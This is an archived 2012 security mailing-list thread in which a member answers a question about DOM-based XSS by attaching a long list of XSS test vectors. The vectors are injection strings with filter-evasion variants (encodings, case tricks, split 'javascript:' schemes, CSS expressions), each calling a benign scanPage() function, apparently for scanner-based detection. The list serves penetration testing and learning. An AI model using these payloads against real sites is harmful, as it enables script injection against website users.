Hey !!!!
You can check for DOM based XSS vulnerabilities with these vectors attached.
Just code a simple Perl script and list the Vulnrabilities !!!!!!
I believe you can understand it much better after going thru these vectors
attached..
If you want my help for it... let me know...
Cheers,
0xN41K
On Wed, May 30, 2012 at 1:16 PM, old chick <[email protected]> wrote:
> Hello Friends,
>
> Recently i done PT of a site and in that i find the DOM Based XSS in that
> i tried to search for that but not understood clearly ,
>
> can any one please tell about this vulnerability,
>
> and how to detect and how to exploit and how to mitigate the risk of the
> DOM Based XSS.
>
>
>
> Thank You
>
>
> --
> You received this message because you are subscribed to the Google Groups
> "nforceit" group.
> To post to this group, send an email to [email protected].
> To unsubscribe from this group, send email to
> [email protected].
> For more options, visit this group at
> http://groups.google.com/group/nforceit?hl=en-GB.
>
--
You received this message because you are subscribed to the Google Groups
"nforceit" group.
To post to this group, send an email to [email protected].
To unsubscribe from this group, send email to
[email protected].
For more options, visit this group at
http://groups.google.com/group/nforceit?hl=en-GB.
<script>scanPage();</script>
"><script>scanPage();</script>
"onmouseover="scanPage()"a="
'onmouseover='scanPage()'a='
'%20onmouseover=scanPage()'
%22%20onmouseover=javascript:scanPage()%20%22
javascript:scanPage()
\');scanPage();//
);scanPage();//
');scanPage();//
%26%2339;-scanPage()//
%22);scanPage();//
%E0<body onload=scanPage()>
%00<body onload=scanPage()>
xss'%20scanPage()%2F%2F
xss%22%20scanPage()%2F%2F
%5C%5C'%2BscanPage()%3B%2F%2F
%3Cscript%3EscanPage()%3B%3C%2Fscript%3E
scanPage()%3B
%3Cscript%3Ea%3D%2FXSS%2F
scanPage()%3C%2Fscript%3E
%22%3E%3Cscript%3EscanPage()%3B%3C%2Fscript%3E
xss%20-%22%3E%3Cscript%3EscanPage()%3C%2Fscript%3E
xss%20%3Cscript%3EscanPage()%3B%3C%2Fscript%3E
<SCRIPT>scanPage();</SCRIPT>
<IMG SRC="javascript:scanPage();">
<IMG SRC=javascript:scanPage()>
"><IMG SRC=javascript:scanPage()>
<IMG SRC=JaVaScRiPt:scanPage()>
<IMG SRC=javascript:eval(String.fromCharCode(115, 99, 97, 110, 80, 97, 103,
101, 40, 41))>
<IMG
SRC=javascript:scanPage()>
<IMG
SRC=javascript:scanPage()>
<IMG
SRC=javascript:scanPage()>
<IMG SRC="jav ascript:scanPage();">
<IMG SRC="jav	ascript:scanPage();">
<IMG SRC="jav
ascript:scanPage();">
<IMG SRC="jav
ascript:scanPage();">
<IMG SRC="  javascript:scanPage();">
\";scanPage();//
<INPUT TYPE="IMAGE" SRC="javascript:scanPage();">
<BODY BACKGROUND="javascript:scanPage()">
<BODY ONLOAD=scanPage()>
<IMG DYNSRC="javascript:scanPage()">
<IMG LOWSRC="javascript:scanPage()">
<BGSOUND SRC="javascript:scanPage();">
<BR SIZE="&{scanPage()}">
<LINK REL="stylesheet" HREF="javascript:scanPage();">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:scanPage();">
<META HTTP-EQUIV="refresh"
CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5zY2FuUGFnZSgpPC9zY3JpcHQ+DQo=">
<META HTTP-EQUIV="Link" Content="<javascript:scanPage()>; REL=stylesheet">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:scanPage();">
<IFRAME SRC="javascript:scanPage();"></IFRAME>
<FRAMESET><FRAME SRC="javascript:scanPage();"></FRAMESET>
<TABLE BACKGROUND="javascript:scanPage()">
<DIV STYLE="background-image: url(javascript:scanPage())">
<DIV STYLE="background-image: url(javascript:scanPage())">
<DIV STYLE="width: expression(scanPage());">
<STYLE>@im\port'\ja\vasc\ript:scanPage()';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(scanPage())">
<XSS STYLE="xss:expression(scanPage())">
exp/*<XSS STYLE='no\xss:noxss("*//*");
<STYLE TYPE="text/javascript">scanPage();</STYLE>
<STYLE>.XSS{background-image:url("javascript:scanPage()");}</STYLE><A
CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:scanPage()")}</STYLE>
<BASE HREF="javascript:scanPage();//">
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url
value=scanPage()></OBJECT>
<!--<value><